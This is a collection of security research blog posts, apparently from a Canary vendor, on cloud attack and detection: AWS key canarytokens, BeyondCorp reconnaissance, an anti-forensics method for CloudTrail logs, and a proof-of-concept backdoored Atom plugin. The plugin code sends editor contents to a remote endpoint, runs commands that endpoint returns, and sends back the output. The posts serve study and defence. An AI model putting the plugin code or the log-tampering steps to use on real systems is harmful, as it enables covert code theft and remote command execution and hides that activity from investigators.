Canarytokens' new member: AWS API key Canarytoken

This is the fourth post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this blog post, we will introduce you to the newest member of our Canarytoken’s family, the Amazon Web Services API key token. This new Canarytoken allows you to sprinkle AWS API keys around and then notifies you when they are used. (If you stick around to the end, we will also share some of the details behind how we built it).

Background

Amazon Web Services offers a massive range of services that are easily integratable with each other. This encourages companies to build entire products and product pipelines using the AWS suite. In order to automate and manipulate AWS services using their API, we are given access keys which can be restricted by AWS policies. Access keys are defined on a per user basis which means there are a few moving parts in order to lock down an AWS account securely.

Take it for a spin - using an AWS API key Canarytoken

Using the AWS API key Canarytoken is as simple as can be. Simply make use of the free token server at http://canarytokens.org or use the private Canarytoken server built into your Canary console. Select the ‘AWS Keys’ token from the drop down list.



Enter an email and a token reminder (Remember: The email address is the one we will notify when the token is tripped, and the reminder will be attached to the alert. Choose a unique reminder, nothing sucks more than knowing a token is tripped, but being unsure where you left it). Then click on “Create my Canarytoken”.



You will notice that we arrange your credentials in the same way as the AWS console usually does, so you can get straight down to using (or testing) them. So lets get to testing. Click “Download your AWS Creds” and save the file somewhere you will find it.

For our tests, we are going to use the AWS Commandline tool (if you don’t have it yet, head over to http://docs.aws.amazon.com/cli/latest/userguide/installing.html). Below is a simple bash script that will leverage the AWS command line tool to create a new user named TestMePlease using your new-almost-authentic AWS API keys.

Simply go to your command line, navigate to the same location as the script and type, ./test_aws_creds.sh <access_key_id> <secret_access_key> . If all went to plan, you should be receiving an alert notifying you that your AWS API key Canarytoken was used.

NB: Due to the way these alerts are handled (by Amazon) it can sometimes take up to 20 minutes for the alert to come through.

Waiting...waiting...waiting (0-20mins later). Ah we got it!


Check...it...out! This is what your AWS API key Canarytoken alert will look like, delivered by email. The email will contain some useful details such as User Agent, Source IP and a reminder of where you may have placed this Canarytoken (we always assumed you not going to use only one! Why would you? They are free!!).

The simple plan then should be: Create a bunch of fake keys. Keep one on the CEO’s laptop. (He will never use it, but the person who compromises him will). Keep one on your webserver (again, no reason for it to be used, except by the guy who pops a shell on that box, etc)

Under the hood - steps to creating an AWS API key Canarytoken

The AWS API key Canarytoken makes use of a few AWS services to ensure that the Canarytoken is an actual AWS API key - indistinguishable from a real working AWS API key. This is important because we want to encourage attackers to have to use the key to find out how juicy it actually is - or isn’t. We also want this to be dead simple to use. Enter your details and click a button. If you want to see how the sausage is made, read on:


Creation - And on the 5th day…


The first service necessary for creating these AWS API key Canarytokens, is an AWS Lambda that is triggered by an AWS API Gateway event. Let’s follow the diagram’s flow. Once you click the ‘Create my Canarytoken’ button, a GET request is sent to the AWS API Gateway. This request contains query parameters for the domain (of the Canarytokens server), the username (if we want to specifiy one, otherwise a random one is generated) and the actual Canarytoken that will be linked to the created AWS API key. This is where the free version and commercial versions diverge slightly.

Our free version of Canarytokens (canarytokens.org), does not allow you to specify your own username for the AWS API key Canarytoken. The domain of the Canarytoken server is used in conjunction with the Canarytoken to create the AWS user on the account. (This is still completely useful, because the only way an attacker is able to obtain the username tied to the token, is to make an API call, and this call itself will trigger the alert). Our private Canary consoles enjoy a slightly different implementation. This uses an AWS Dynamo Database that links the users to their tokens and allowing clients the opportunity to specify what the user name for your AWS user should be. 

If the AWS API Gateway determines that sufficient information is included in the request, it triggers the lambda responsible for creating the AWS API key Canarytoken. This lambda creates a new user with no privileges on the AWS account, generates AWS API keys for that user and responds to the request with a secret access key and an access key id.


We should note that the newly created user has no permissions (to anything), so anyone with this AWS API key can’t do anything of importance. (Even if they did, its a user on our infrastructure, not yours!). Of course, before the attacker is able to find out how impotent her key is, she first has to use it and this is when we catch them out (detection time!).

Detection - I see you! 

Now that the AWS API key has been created and returned to the user, lets complete the loop and figure out when these AWS API keys are being used. The first service in our detection process, spoken about in our previous posts, is CloudTrail. CloudTrail is super useful when monitoring anything on an AWS account because it logs all important (not all) API calls recording the username, the keys used, the methods called, the user-agent information and a whole lot more. 

We configure CloudTrail to send its logs to another AWS logging service known as CloudWatch. This service allows subscriptions and filtering rules to be applied. This means that if a condition in the logs from CloudTrail is met in the CloudWatch service, it will trigger whichever service you configure it to - in our case another AWS Lambda function. In pure AWS terms, we have created a subscription filter which will send logs that match the given filter to our chosen lambda.

For the AWS API key Canarytoken, we use a subscription filter such as

  • "FilterPattern": "{$.userIdentity.type = IAMUser}"

This filter will check the incoming logs from CloudTrail and only send logs that contain the user identity as an IAM User - this is different from using root credentials as the user is then ‘root’.

Alert - Danger Will Robinson, danger!

All thats left now is for us to generate our Alert. We employ an AWS Lambda (again) to help us with this. This lambda receives the full log of the attempted AWS API call and bundles it into a custom HTTP Request that trips the Canarytoken. Our Canarytoken Server receives the request with all this information and relays the alert to you with all the information formatted neatly.

Summary - TLDR;

Amazon Web Services is a massive collection of easily integratable services which enables companies of all sizes to build entire products and services with relative ease. This makes AWS API keys an attractive target for many attackers.

The AWS API key Canarytoken allows the creation of real AWS API keys which can be strewn around your environment. An attacker using these credentials will trigger an alert informing you of his presence (and other useful meta information).. It’s quick, simple, reliable and a high quality indicator of badness.

Farseeing: a look at BeyondCorp

This is the third post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

In our BlackHat talk, "Fighting the Previous War", we showed how attacks against cloud services and cloud-native companies are still in their nascent stages of evolution. The number of known attacks against AWS is small, which is at odds with the huge number (and complexity) of services available. It's not a deep insight to argue that the number of classes of cloud specific attacks will rise.

However, the "previous war" doesn't just refer to cloud stuff. While our talk primarily dealt with cloud services, we also spent some time on another recent development, Google's BeyondCorp. In the end, the results weren't exciting enough to include fully in the talk and so we cut slides from the presentation, but the original slides are in the PDF linked above.

In this post we'll provide our view on what BeyondCorp-like infrastructure means for attackers, and how it'll affect their approaches.

What is BeyondCorp?

We start with a quick overview of BeyondCorp that strips out less important details (Google has a bunch of excellent BeyondCorp resources if you've never encountered it before.)

In an ossified corporate network, devices inside the perimeter are more trusted than devices outside the perimeter (e.g. they can access internal services which are not available to the public Internet). In addition, devices trying to access those service aren't subject to checks on the device (such as whether the device is known, or is fully patched).

In the aftermath of the 2009 Aurora attacks on Google, where attackers had access to internal systems once the boundary perimeter was breached, Google decided to implement a type of Zero Trust network architecture. The essence of the new architecture was that no trust was placed in the location of a client regardless of whether the client was located inside a Google campus or sitting at a Starbucks wifi. They called it BeyondCorp.

Under BeyondCorp, all devices are registered with Google beforehand and all access to services is brokered through a single Access Proxy called ÜberProxy.

This means that all Google's corporate applications can be accessed from any Internet-connected network, provided the device is known to Google and the user has the correct credentials (including MFA, if enabled.)

Let's walk through a quick example. Juliette is a Google engineer sitting in a StarBucks leaching their Wifi, and wants to review a bug report on her laptop. From their documentation, it works something like this (we're glossing over a bunch of details):
  1. Juliette's laptop has a client certificate previously issued to her machine.
  2. She opens https://tickets.corp.google.com in her browser.
  3. The DNS response is a CNAME pointing to uberproxy.l.google.com (this is the Access Proxy). The hostname identifies the application.
  4. Her browser connects using HTTPS to uberproxy.l.google.com, and provides its client certificate. This identifies her device.
  5. She's prompted for credentials if needed (there's an SSO subsystem to handle this). This identifies her user.
  6. The proxy passes the application name, device identifier (taken from the client certificate), and credentials to the Access Control Engine (ACE).
  7. The ACE performs an authorization check to see whether the user is allowed to access the requested application from that device.
  8. The ACE has access to device inventory systems, and so can reason about device trust indicators such as:
    1. a device's patch level
    2. its trusted boot status
    3. when it was last scanned for security issues
    4. whether the user has logged in from this device previously
  9. If the ACE passes all checks, the access proxy allows the request to pass to the corporate application, otherwise the request fails.
Google's architecture diagrams include more components than we've mentioned above (and the architecture changed between their first and most recent papers on BeyondCorp). But the essence is a proxy that can reason about device status and user trust. Note that it's determining whether a user may access a given application, not what they do within those applications.

One particularly interesting aspect of BeyondCorp is how Google supports a bunch of protocols (including RDP and SSH) through the same proxy, but we won't look at that today. (Another interesting aspect is that Google managed to migrate their network architecture without interruption and is, perhaps, the biggest takeaway from their series of papers. It's an amazingly well planned migration.)

This sucks! (For attackers)

For ne'er-do-wells, this model changes how they go about their business. 

Firstly, tying authorisation decisions to devices has a big limiting effect on credential phishing. A set of credentials is useless to an external attacker if the authorisation decision includes an assertion that the device has previously been used by this user. Impersonation attacks like this become much more personal, as they require device access in addition to credentials.

Secondly, even if a beachhead is established on an employee's machine, there's no flat network to laterally move across. All the attacker can see are the applications for which the victim account had been granted access. So application-level attacks become paramount in order to laterally move across accounts (and then services).

Thirdly, access is fleeting. The BeyondCorp model actively incorporates updated threat information, so that (for example), particular browser versions can be banned en masse if 0days are known to be floating around. 

Fourthly, persistence on end user devices is much harder. Google use verified boot on some of their devices, and BeyondCorp can take this into account. On verified boot devices, persistence is unlikely to take the form of BIOS or OS-level functionality (these are costly attacks with step changes across the fleet after discovery, making them poor candidates). Instead, higher level client-side attacks seem more likely.

Fifthly, in addition to application attacks, bugs in the Access Control Engine or mistakes in the policies come into play, but these must be attacked blind as there is no local version to deploy or examine.

Lastly, targeting becomes really important. It's not enough to spam random @target.com addresses with dancingpigs.exe, and focus once inside the network. There is no "inside the network", at best you access someone's laptop, and can hit the same BeyondCorp apps as your victim.

A quick look at targeting

The lack of a perimeter is the defining characteristic of BeyondCorp, but that means anyone outside Google has a similar view to anyone inside Google, at least for the initial bits needed to bootstrap a connection.

We know all services are accessed through the ÜberProxy. In addition, every application gets a unique CNAME (in a few domains we've seen, like corp.google.com, and googleplex.com).

DNS enumeration is a well-mapped and frequently-trod path, and effective at discovering corporate BeyondCorp applications. Pick a DNS enumeration tool (like subrute), run it across the corp.google.com subdomain, and get 765 hostnames. Each maps to a Google Corporate application. Here's a snippet from the output:
  • [...]
  • pitch.corp.google.com
  • pivot.corp.google.com
  • placer.corp.google.com
  • plan.corp.google.com
  • platform.corp.google.com
  • platinum.corp.google.com
  • plato.corp.google.com
  • pleiades.corp.google.com
  • plumeria.corp.google.com
  • [...]
But DNS isn't the only place to identify BeyondCorp sites. As is the fashion these days, Google is quite particular about publishing new TLS certificates in the Certificate Transparency logs. These include a bunch of hostnames in  corp.google.com and googleplex.com. From these more BeyondCorp applications were discovered.

Lastly, we scraped the websites of all the hostnames found to that point and found additional hostnames referenced in some of the pages and redirects. For fun, we piped into PhantomJS and screencapped all the sites for quick review.

Results? We don't need no stinking results!


The end result of this little project was a few thousand screencaps of login screens:

Quite a few of these
Error showing my device isn't
allowed access to this service
Occasional straight 403


So, so many of these
Results were not exciting. The only site that was open to the Internet was a Cafe booking site on one of Google's campuses.

However, a few weeks ago a high school student posted the story of his bug bounty which appeared to involve an ÜberProxy misconfiguration. The BeyondCorp model explicitly centralises security and funnels traffic through proxy chokepoints to ease authN and authZ decisions. Like any centralisation, it brings savings but there is also the risk of a single issue affecting all applications behind the proxy. The takeaway is that mistakes can (and will) happen. 


So where does this leave attackers?

By no means is this the death of remote attacks, but it shifts focus from basic phishing attacks and will force attackers into more sophisticated plays. These will include more narrow targeting (of the BeyondCorp infrastructure in particular, or of specific endusers with the required application access), and change how persistence on endpoints is achieved. Application persistence increases in importance, as endpoint access becomes more fleeting.

With all this said, it's unlikely an attacker will encounter a BeyondCorp environment in the near future, unless they're targeting Google. There are a handful of commercial solutions which claim BeyondCorp-like functionality, but none rise to the same thoroughness of Google's approach. For now, these BeyondCorp attack patterns remain untested.

Disrupting AWS S3 Logging

This post continues the series of highlights from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

Before today's public clouds, best practice was to store logs separately from the host that generated them. If the host was compromised, the logs stored off it would have a better chance of being preserved.

At a cloud provider like AWS, a storage service within an account holds your activity logs. A sufficiently thorough compromise of an account could very well lead to disrupted logging and heightened pain for IR teams. It's analogous to logs stored on a single compromised machine: once access restrictions to the logs are overcome, logs can be tampered with and removed. In AWS, however, removing and editing logs looks different to wiping logs with rm -rf.

In AWS jargon, the logs originate from a service called CloudTrail. A Trail is created which delivers the current batch of activity logs in a file to a pre-defined S3 bucket at variable intervals. (Logs can take up to 20 mins to be delivered).

CloudTrail logs are often collected in the hope that should a breach be discovered, there will be useful audit trail in the logs. The logs are the only public record of what happened while the attacker had access to an account, and form the basis of most AWS defences. If you haven't enabled them on your account, stop reading now and do your future self a favour.

Prior work

In his blog post, Daniel Grzelak explored several fun consequences of the fact that logs are stored in S3. For example, he showed that when a file lands in an S3 bucket, it triggers an event. A function, or Lambda in AWS terms, can be made to listen for this event and delete logs as soon as they arrive. The logs continue to arrive as normal (except for the logs evaporating on arrival.)

Flow of automatic log deletion

Versions, lambdas and digests

Adding "versioning" to S3 buckets (which keeps older copies of files once they are overwritten) won't help, if an attacker can grant permission to delete the older copies. Versioned buckets do have the option of having versioned items protected from deletion by multi-factor auth ("MFA-delete"). Unfortunately it seems like only the AWS account's root user (as the sole owner all S3 buckets in an account) can configure this, making it less easy to enable in typical setups where root access is tightly limited.

In any case, an empty logs bucket will inevitably raise the alarm when someone comes looking for logs. This leaves the attacker with a pressing question: how do we erase our traces but leave the rest of the logs available and readable? The quick answer is that we can modify the lambda to check every log file and delete any dirty log entries before overwriting them with a sanitised log file.

But a slight twist is needed: when modifying logs, the lambda itself generates more activity which in turn adds more dirty entries to the logs. By adding a unique tag to the names of pieces of the log-sanitiser (such as name of the policies, roles and lambdas), these can be deleted like any other dirty log entries so that the log-sanitiser eats it's own trail. In this code snippet, any role, lambda or policy that includes thinkst_6ae655cf will be kept out of the logs.

That would seem to present a complete solution, except that AWS Cloudtrail also offers log validation (aimed specifically at mitigating silent changes to logs after delivery). At regular intervals, the log trail delivers a (signed) digest file that attests to the contents of all the log files delivered in the past interval. If a log file covered by the digest changes, that digest file validation fails.

A slew of digest files

At first glance this stops our modification attack in its tracks; our lambda modified the log after delivery, but the digest was computed on the contents prior to our changes. So the contents and the digest won't match.

Also covered by each digest file, is the previous digest file. This creates a chain of log validation starting at the present and going back up the chain into the past. If the previous digest file has been modified or is missing, the next digest file validation will fail (but subsequent digests will be valid.) The intent behind this is clear: log tampering should show that AWS command line log validation shows an error.

Chain of digests and files they cover
Contents of a digest file



It would seem that one option is to simply remove digest files, but S3 protects them and prevents deletion of files that are part of an unbroken digest chain.

There's an important caveat to be aware of though: when log validation is stopped and started on a Trail (as opposed to stopping and starting the logging itself), the log validation chain is broken in an interesting way. The next digest file that is delivered doesn't refer to previous digest file since validation was stopped and started. Instead, the next digest file references null as its previous file, as if it's a new digest chain starting afresh.

Digest file (red) that can be deleted following a stop-start
In the diagram above, after the log files in red were altered, log validation was stopped and started. This broke the link between digest 1 and digest 2.

Altered logs, successful validation

We said that S3 prevented digest file deletion on unbroken chains. However, older digest files can be removed so long as no other file refers to them. That means we can delete digest 1, then delete digest 0.

What this means is that on the previous log validation chain, we can now delete the latest digest entry file without failing any digest log validation. The log validation will start at the most recent chain, and move back up. When the validation encounters the first item on the previous chain, it simply moves on to the latest available item of the previous chain. (There may be a note about no log files being delivered for a period, but this is the same message that arrives when no log files are delivered as well.)

No complaints validity complaints about missing digest files

And now?

It's easy to imagine that log validation is simply included in automated system health-checks; so long as it doesn't fail, no one will be verifying logs.  Until they're needed, of course, at which point the logs could have been changed without validation producing an error condition.

This attack signature is: validation was stopped and started (rather than logging being stopped and started). It underscores the importance of alerting on CloudTrail updates, even if it doesn't stop logging. (One way would be to alert on UpdateTrail events using the AWS CloudWatch service.) A single validation stop and start event, means it is not a safe to assume that the AWS CLI tool reporting that all logs validate means that the logs haven't been tampered with. The log validation should be especially suspect if there are breaks in the digest validation chain, which would have to be manually verified.

Much like in the case of logs stored on a single compromised host, logs should be interpreted with care when we are dealing with compromised AWS accounts that had the power to alter them..

All your devs are belong to us: how to backdoor the Atom editor

This is the first post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this post we'll be looking at ways to compromise your developers that you probably aren't defending against, by exploiting the plugins in their editors. We will therefore be exploring Atom, Atom plugins, how they work and the security shortfalls they expose.

Targeting developers seems like a good idea (targeting sysadmins is so 2014). If we can target them through a channel that you probably aren't auditing, thats even better!

Background

We all need some type of editor in our lives to be able to do the work that we do. But, when it comes to choosing an editor, everyone has their own views. Some prefer the modern editors like Atom or Sublime, while others are more die-hard/ old school and prefer to stick to Vim or Emacs. Whatever you chose, you'll most likely want to customize it in some way (if not, I am not sure I can trust you as a person let alone a developer).  

Plugins and Extensions on modern editors are robust. Aside from cosmetic customization (font, color scheme, etc) they also allow you a range of functionality to make your life easier: from autocomplete and linters to minimaps, beautifiers and git integration, you should be able to find a plugin that suits your needs. If you don't, you can just create and publish one.

Other users will download new plugins to suit their needs, continuously adding to their ever growing list of them (because who has the time to go back and delete old unused plugins?) Many editors support automatic updates to ensure that any bugs are fixed and new features are enjoyed immediately.

For this post I'll focus specifically on Atom, Github's shiny new editor.  According to their site it's a "hackable text editor for the 21st century" (heh!). Atom's user base is continuously growing, along with their vast selection of packages.  You can even install Atom on your Chromebook with a few hacks, which bypasses the basic security model on ChromeOS.

The Goal

I was tasked with exploring the extent of damage that a malicious Atom plugin could do. We weren't sure what obstacles we'd face or what security measures were in place to stop us being evil. It turns out there were none... within a couple hours I had not only published my first app, but had updated it to include a little bit of malicious code too. 

The plan was simple:


Step One:  Get a simple package (plugin) published
  • What was required and how difficult would it be (do we need our app to be vetted)?
Step Two:  Test the update process
  • If you were going to create a malicious package you'd first create a useful non-malicious one that would create a large user base and then push an update that would inject the unsavory code.
Step Three:  Actually test what we could achieve from within an Atom package
  • We'd need to determine if there was any form of sandboxing, what libraries we'd have access to, etc.

Hello Plugin

Step One

This was trivially simple. There are lots of guides to creating and publishing packages for Atom out there, including a detailed one on their site.  

Generate a new package:

cmd + shift + p
Package Generator: Generate Package 

This will give you a package with a simple toggle method that we will use later:

toggle: ->
    console.log 'touch-type-teacher was toggled!'

Push the code to a Git repo:

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

Publish your Atom package 

apm-beta publish minor

Step Two

This was even easier seeing as the initial setup was complete:  

Make a change:

toggle: ->
    console.log 'touch-type-teacher was toggled!'
    console.log 'update test'

Push it to Github:

git commit -a -m 'Add console logging'
git push

Publish the new version:

apm-beta publish minor

So that's step one and two done, showing how easy it is to publish and update your package. The next step was to see what could actually be done with your package.  


That seems like a reasonable request

Step Three

Seeing as packages are built on node.js, the initial test was to see what modules we had access to.

The request package seemed a good place to start as it would allow us to get data off the user's machine and into our hands.

Some quick digging found that it was easy to add a dependency to our package:

npm install --save request@2.73.0
apm install

Import this in our code:

request = require 'request'

Update our code to post some data to our remote endpoint:

toggle: ->
    request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>            
        console.log 'Data sent!'

With this, our package will happily send information to us whenever toggled.

Now that we have a way to get information out, we needed to see what kind of information we had access to.

Hi, my name is...

Let's change our toggle function to try and get the current user and post that:

toggle: ->
    {spawn} = require 'child_process'
    test = spawn 'whoami'
    test.stdout.on 'data', (data) ->
        request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
            console.log 'Output sent!'

This actually worked too... meaning we had the ability to run commands on the user's machine and then extract the output from them if needed.

At this point we had enough information to write it up, but we took it a little further (just for kicks).

Simon Says

Instead of hardcoding commands into our code, let's send it commands to run dynamically! While we are at it, instead of only firing on toggling of our package, let's fire whenever a key is pressed.

First we'll need to hook onto the onChange event of the current editor:

module.exports = TouchTypeTeacher =
  touchTypeTeacherView: null
  modalPanel: null
  subscriptions: null
  editor: null

  activate: (state) ->
    @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState)
    @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false)
    @editor = atom.workspace.getActiveTextEditor()
    @subscriptions = new CompositeDisposable

    @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle()
    @subscriptions.add @editor.onDidChange (change) => @myChange()

Then create the myChange function that will do the dirty work:

myChange: ->
    request 'http://my-remote-endpoint.com/test?data=' +@editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
        test = spawn body
        console.log 'External code to run:\n' + body
        test.stdout.on 'data', (data) ->
           console.log 'sending output'
           request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) =>
               console.log 'output sent!'

What happens in this code snippet is a bit of overkill but it demonstrates our point. On every change in the editor we will send the text in the editor to our endpoint, which in turn returns a new command to execute. We run the command and send the output back to the endpoint.

Demo

Below is a demo of it in action. On the left you'll see the user typing into the editor, and on the right you'll see the logs on our remote server.

video


Our little plugin is not going to be doing global damage anytime soon. In fact we unpublished it once our tests were done. But what if someone changed an existing plugin which had lots of active users? Enter Kite.

Kite and friends

While we were ironing out the demo and wondering how prevalent this kind of attack was, an interesting story emerged. Kite, who make cloud-based coding tools, hired the developer of Minimap (an Atom plugin with over 3.8 million downloads) and pushed an update for it labelled "Implement Kite promotion". This update, among other things, inserted Kite ads onto the minimap.

In conjunction with this, it was found that Kite had silently acquired autocomplete-python (another popular Atom plugin) a few months prior and had promoted the use of Kite over the open source alternative.

Once discovered, Kite was forced to apologize and take steps to ensure they would not do it again (but someone else totally could!).

Similar to the Kite takeover of Atom packages (but with more malicious intent) in the past week it has been reported that two Chrome extensions had been taken over by attackers and had adware injected into them. Web Developer for Chrome and Copyfish both fell victims to the same phishing attack. Details of the events can be read about here (Web Developer) and here (Copyfish) but the gist of it was the popular extensions for Chrome had been compromised and users of the extensions fell victim without knowing it.

Wrapping up

We created a plugin and published it without it being picked up as malicious. This plugin runs without a sandbox and without a restrictive permissions model to prevent us stealing all the information the user has access to. Even if there was some kind of code analysis conducted on uploaded code, it's possible to remotely eval() code at runtime.  Automatic updates means that even if our plugin is benign today, it could be malicious tomorrow.

Forcing developers to use only a certain controlled set of tools/plugins seems draconian, but if it is not controlled, it's getting more and more difficult to secure.



BlackHat 2017 Series

[Update: jump to the end of the page for the series index]

Late July found Haroon and I sweating buckets inside an 8th storey Las Vegas hotel room. Our perspiration was due not to the malevolent heat outside but to the 189 slides we were building for BlackHat 2017. Modifications to the slidedeck continued until just before the talk, and we're now posting a link to the final deck. Spoiler alert: it's at the bottom of this post.

A few years ago (2009, but who's counting) we spoke at the same conference and then at DEF CON on Clobbering the Cloud. It's a little hard to recall the zeitgeist of bygone times, but back then the view that "the Cloud is nothing new" was prominent in security circles (and, more broadly, in IT). The main thrust of the previous talk was taking aim at that viewpoint, showing a bunch of novel attacks on cloud providers and how things were changing:


Eight years on, and here we are again talking about Cloud. In the intervening years we've built and run a cloud-reliant product company, and securing that chews up a significant amount of our time. With the benefit of actual day-to-day usage and experience we took another crack at Cloud security. This time the main thrust of our talk was:


In our 2017 talk we touch on a bunch of ways in which security teams are often still hobbled by a view of Cloud computing that's rooted in the past, while product teams have left most of us in the dust. We discuss insane service dependency graphs and we show how simple examples of insignificant issues in third parties boomerang into large headaches. We talk software supply chains for your developers through malicious Atom plugins. Detection is kinda our bag, so we're confident saying that there's a dearth of options in the Cloud space, and go to some lengths to show this. We cover seldom-examined attack patterns in AWS, looking at recon, compromise, lateral movement, privesv, persistence and logging disruption. Lastly we took an initial swing at BeyondCorp, the architecture improvement from Google that's getting a bunch of attention.

We'd be remiss in not mentioning Atlassian's Daniel Grzelak who has been developing attacks against AWS for a while now. He's been mostly a lone voice on the topic.

One of our takeaways is that unless you're one of the few large users of cloud services, it's unlikely you're in a position to devote enough time to understanding the environment. This is a scary proposition as the environment is not fully understood even by the large players. You thought Active Directory was complex? You can host your AD at AWS, it's 1 of 74 possible services you can run on AWS.

The talk was the result of collaboration between a bunch of folks here at Thinkst. Azhar, Jason, Max and Nick all contributed, and in the next few weeks we'll be seeing posts from them talking about specific sub-topics they handled. We'll update this post as each new subtopic is added.

The full slidedeck is available here.

Posts in this series


  1. All your devs are belong to us: how to backdoor the Atom editor
  2. Disrupting AWS S3 Logging
  3. Farseeing: a look at BeyondCorp
  4. Canarytokens' new member: AWS API key Canarytoken

A guide to Birding (aka: Tips for deploying Canaries)

Heres a quick, informal guide to deploying birds. It isn't a Canary user guide and should:
  • be a fun read;
  • be broadly applicable. 
One of Canary's core benefits is that they are quick to deploy (Under 5 minutes from the moment you unbox them) but this guide should seed some ideas for using them to maximum effect.

Grab the Guide Here (No registration, No Tracking Link, No Unnecessary Drama)

If you have thoughts, comments, or ideas, hit us back at info@canary.tools or DM us on twitter @thinkstCanary

Get notifications when someone accesses your Google Documents (aka: having fun with Google Apps Script)


Our MS Word and PDF tokens are a great way to see if anyone is snooping through your documents. One simply places the document in an enticing location and waits. If the document is opened, a notification (containing useful information about the viewer) is sent to you. Both MS Word tokens and PDF tokens work by embedding a link to a resource in the tokened document. When the document is opened an attempt to fetch the resource is made. This is the request which tickles the token-server, which leads to you being notified.

Because so many of us store content on Google Drive we wanted to do something similar with Google Documents and Google Sheets. Using the embedded image approach was possible in Google Sheets, however, due to image caching coupled with weak API support for Google Documents we turned to Google Apps Script.

Google Apps Script is a powerful Javascript platform with which to create add-ons for Google Sheets, Docs, or Forms. Apps Script allows your documents to interface with most Google services - it's pretty sweet. Want to access all your Drive files from a spreadsheet? No problem! Want to access the Google Maps service from a document? No problem! Want to hook the Language API to your Google Forms? Easy. It's also possible to create extensions to share with the community. You can even add custom UI features.

The Apps Script files can be published in three different ways.

  1. The script may be bound to a document (this is the approach we followed);
  2. It may be published as a Chrome extension;
  3. It may be published to be used by the Google Execution API (the Execution API basically allows you to create ones own API endpoints to be used by a client application).  

With the script bound to a document, the Apps Script features most important for our purposes are: Triggers, the UrlFetchApp service, and the Session service. A brief outline of the flow is:

  1. A user opens the document, 
  2. A trigger is fired which grabs the perpetrator's email address;
  3. This is sent via a request notification to the document owner. 

A more detailed outline of each feature is given bellow.

Triggers

Apps Script triggers come in two flavours: simple and installable. The main difference between the two is the number of services they're allowed to access. Many services require user authorisation before giving the app access to a user's data. Each flavour also has separate types. For example: "on open", "on edit", "on install", even timed triggers.  For our purposes the "on open" installable triggers proved most useful.

UrlFetchApp service

This service simply gives one's script the ability to make HTTP requests. This service was used to send the requests needed to notify the document owner that the token'd document had been opened. Useful information about the document viewer may also be sent as the payload of a POST request.

Session service

The Session service provides access to session information, such as the user's email address and language setting. This was used to see exactly which user opened the document.

Putting it all together

So, what does this all look like? Let's go ahead and open up a new Google sheet and navigate to the Script editor.


Open the Script editor


Once in the Script editor create a new function named whatever you like (in our case it is called "notify"). Here a payload object is constructed which contains the email address of the document owner, the email address of the document viewer and the document viewer's locale. This information is then sent to an endpoint. Here we use hookbin for convenience. 


Write a function which sends user information to an endpoint


Once the file has been saved and our notify function is solid, we can go ahead and add the "on open" trigger. To do this: open the Edit tab dropdown from the script editor and go to "Current project's triggers".

Open the project's triggers


Under the current project's triggers add an "On open" trigger to the notify function. This trigger will cause the "notify" function to run each time the document is opened.


Add an "On open" trigger to the "notify" function

Because the function is accessing user data (the Session service) as well as connecting to an external service (sending requests to Hookbin) the script will require a set of permissions to be accepted before being run.


Set of permissions needed by the installable trigger


Once the permissions have been accepted all that remains is for the document to be shared. You can share the document with specific people or anyone on the internet. The only caveat being that the document needs to be shared with EDIT permissions or else the script will not function correctly.

Every time the document is opened post requests will be sent to the endpoint. Below is an example of the contents of the POST request sent to Hookbin.

The request contents received by the endpoint

Limitations

We ran into a few limitations while investigating the use of Apps Script for tokens. While copying a document as another Google user would also copy the script bound to the document, it would not copy the triggers if any had been previously installed. Thus, the user with which the document was shared would need to manually add the triggers to the copied document. Another limitation was that anyone viewing the document needed to have EDIT permissions in order for the script to work correctly. This could prove problematic if the person viewing the document decided to delete/edit the script and/or document.

We overcame this, through some creativity and elbow grease..

onEnd()

Thanks for reading. The methods described here were used in our new Google Docs/Sheets Canarytokens for our Canary product, you should totally check them out! We hope you found this useful and that you'll come up with some other cool new ways to use Google Apps Script!

Introducing our Python API Wrapper


Introducing our Python API Wrapper

With our shiny new Python API wrapper, managing your deployed Canaries has never been simpler. With just a few simple lines of code you'll be able to sort and store incident data, reboot all of your devices, create Canarytokens, and much more (Building URLs correctly and parsing JSON strings is for the birds...).

So, how do you get started? Firstly you'll need to install our package. You can grab it from a number of places:
  • Or simply startup your favourite shell and run "pip install canarytools"
Assuming you already have your own Canary Console (see our website for product options) and a flock of devices, getting started is very easy indeed! First, instantiate the Console object: 


Your API_KEY can be retrieved from your Console's Console Setup page. The CLIENT_DOMAIN is the tag in-front of "canary.tools" in your Console's url. For example in https://testconsole.canary.tools/settings "testconsole" is the domain.

Alternatively a .config file can be downloaded and placed on your system (place this in ~/ for Unix (and Unix-like) environments and C:\Users\{Current Users}\ for Windows environments). This file contains all the goodies needed for the wrapper to communicate with the Console. Grab this from the Canary Console API tab under Console Setup (This is great if you'd rather not keep your api_key and/or domain name in your code base).



Click 'Download Token File' to download the API configuration file.




To give you a taste of what you can do with this wrapper, let's have a look at a few of its features:

Device Features

Want to manage all of your devices from the comfort of your bash-shell? No Problem...

Assuming we have instantiated our Console object we can get a handle to all our devices in a single line of code:

From here it is straightforward to do things such as update all your devices, or even reboot them:

Incident Features

Need the ability to quickly access all of the incidents in your console? We've got you covered. Getting a list of incidents across all your devices and printing the source IP of the incident is easy:

Acknowledging incidents is also straightforward. Let's take a look at acknowledging all incidents from a particular device that are 3 weeks or older:


Canarytoken Features

Canarytokens are one of the newest features enabled on our consoles. (You can read about them here). Manage your Canarytokens with ease. To get a list of all your tokens simply call:

You can also create tokens:


Enable/disable your tokens:


Whitelist Features

If you'd like to whitelist IP addresses and destination ports programmatically, we cater for that too:


This is just a tiny taste of what you can do with the API. Head over to our documentation to see more. We're hoping the API will make your (programatic) interactions with our birds a breeze.

Cloud Canary Beta

Is that a cloud next to Tux?

We are sorry that this blog has been so quiet lately. Our Canary product took off like a rocket and we've had our heads down giving it our all. This month we released version-2 with a bunch of new features. You really should check it out.

